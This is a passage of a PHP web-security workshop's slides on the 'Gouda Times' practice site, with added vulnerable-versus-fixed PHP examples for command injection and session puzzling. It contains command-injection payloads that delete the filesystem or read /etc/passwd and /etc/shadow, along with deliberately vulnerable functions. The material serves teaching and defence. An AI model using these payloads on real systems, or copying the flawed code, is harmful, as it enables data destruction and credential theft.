  • 52. What’s the danger? • $_GET['dir'] = '.; rm -rf / *'; • Or whatever. • cat /etc/passwd; cat /etc/shadow
  • 53. How to prevent? • If you must use user input in a command, use escapeshellarg() • $dir = escapeshellarg($_GET['dir']); • $files = shell_exec('ls -al ' . $dir); • Validate that the input is allowed
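The file browser from slide 51 with the slide 53 fix applied (validate the input, then escapeshellarg), as an added example that is not the talk's own code. WEB_ROOT is an assumed base directory; the example also shows the listing done without a shell at all.

```php
<?php
// Added example, not the talk's own code. WEB_ROOT is an assumed path.
define('WEB_ROOT', '/var/www/goudatimes');

// VULNERABLE: $_GET['dir'] = '.; cat /etc/passwd' makes the shell run a
// second command, because the value is pasted straight into the command line.
function listDirVulnerable($dir)
{
    return shell_exec('ls -al ' . $dir);
}

// Returns the resolved directory if it lies inside WEB_ROOT, otherwise false.
// realpath() collapses '../', so '../../etc' resolves outside the root and
// symlinks are followed before the check rather than after it.
function resolveInsideRoot($dir)
{
    $root   = realpath(WEB_ROOT);
    $target = realpath(WEB_ROOT . '/' . $dir);
    if (!$root || !$target) {
        return false;
    }
    $inside = ($target === $root)
        || (strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0);
    return ($inside && is_dir($target)) ? $target : false;
}

// FIXED: validate first, then pass the path as ONE shell argument.
// escapeshellarg() wraps it in single quotes and escapes embedded quotes,
// so ';', '|' and '$(...)' are just characters in a file name.
function listDir($dir)
{
    $target = resolveInsideRoot($dir);
    if ($target === false) {
        error_log('Rejected directory listing for: ' . $dir);
        return false;
    }
    return shell_exec('ls -al ' . escapeshellarg($target));
}

// Better still: no shell at all. scandir() produces the same listing
// without a command line for anything to be injected into.
function listDirNoShell($dir)
{
    $target = resolveInsideRoot($dir);
    return ($target === false) ? false : scandir($target);
}

$files = listDirNoShell(isset($_GET['dir']) ? $_GET['dir'] : '.');
```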
  • 54. Other types of injection ● Code (eval) ● Regex ● Log ● LDAP
  • 55. Other exploits ● Authentication / Session management ● Information disclosure ● Sensitive data exposure ● File upload flaws ● Unchecked redirects ● Leftover debug code ● Session fixation ● Internal threats ● Privacy Violation (password in logs, etc)
  • 56. Mitigation • Validation on the client • Reject invalid requests entirely, log intrusion attempt • Principle of least privilege • Filter input, escape output
  • 57. One more exploit • Session puzzling attack • http://bit.ly/1eO7jPK
  • 58. Session Puzzling • Making requests to privileged and unprivileged pages in a particular order that can escalate privileges of the attacker
  • 59. How it could work • Page requiring authentication looks for ‘user’ in session to determine authentication
  • 60. Session Puzzling • Login -> forgot password page sends information via ‘user’ in session
  • 61. Put it together • Hit pages quickly in this order: • Login -> forgot password / privileged page • Privileged page sees ‘user’ and allows attacker in
  • 62. How was this found? • By accident, via web crawler getting access to privileged pages
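The session-puzzling pattern from slides 59 to 61 next to a fixed version that keeps the password-reset state and the authenticated identity under different keys, as an added example that is not the talk's own code. Page names, the users table and the session key names are assumptions; password_verify() needs PHP 5.5 or later.

```php
<?php
// Added example, not the talk's own code. Session key names, page names
// and the users table are assumptions.
session_start();

// VULNERABLE: forgot-password stores the looked-up account under the same
// 'user' key that privileged pages treat as "logged in" (slides 59-60).
function forgotPasswordVulnerable($username)
{
    $_SESSION['user'] = $username;      // meant only for the reset e-mail
}
function isLoggedInVulnerable()
{
    return isset($_SESSION['user']);     // satisfied by the line above
}

// FIXED: the reset flow and the authenticated identity never share a key,
// and the auth key is written only after a successful password check.
function forgotPassword($username)
{
    $_SESSION['password_reset'] = array('user' => $username, 'at' => time());
}

function login(PDO $db, $username, $password)
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = :u');
    $stmt->execute(array(':u' => $username));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$row || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);         // fresh id: also defeats session fixation (slide 55)
    unset($_SESSION['password_reset']);  // a real login ends any pending reset
    $_SESSION['auth'] = array('user_id' => (int) $row['id'], 'since' => time());
    return true;
}

function isLoggedIn()
{
    return isset($_SESSION['auth']['user_id']);
}

// Guard at the top of every privileged page: hitting forgot-password first
// sets 'password_reset', which this check ignores.
if (!isLoggedIn()) {
    header('Location: /login.php');
    exit;
}
```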
  • 63. Now what? • Find as many exploits as possible in Gouda Times • Be creative, you can use multiple exploits in a single creative hack • Stuck for ideas?
  • 64. Ideas • Trick the system to give up another user’s password • Log in to the system as another user without knowing their password • Change guestbook entries • Remove guestbook entries
  • 65. More ideas • View nearly any file on the system • Get your own code onto the system • Find hidden functionality • Exploit the site with an image • Create more users than the system thinks you should have • Social engineering - get someone to tell you a password
  • 66. Time to get with the hacking
  • 67. If you have questions or need help I’ll be around • If you get a hack to work, let me know and you can share what you did and how • If you want to try to fix it, the source is on the VM - show me your fix, I’ll try to break it
  • 68. Want to hack more? • http://www.badstore.net/ • http://google-gruyere.appspot.com/ • http://www.dvwa.co.uk/
  • 69. Please rate this tutorial • https://joind.in/14040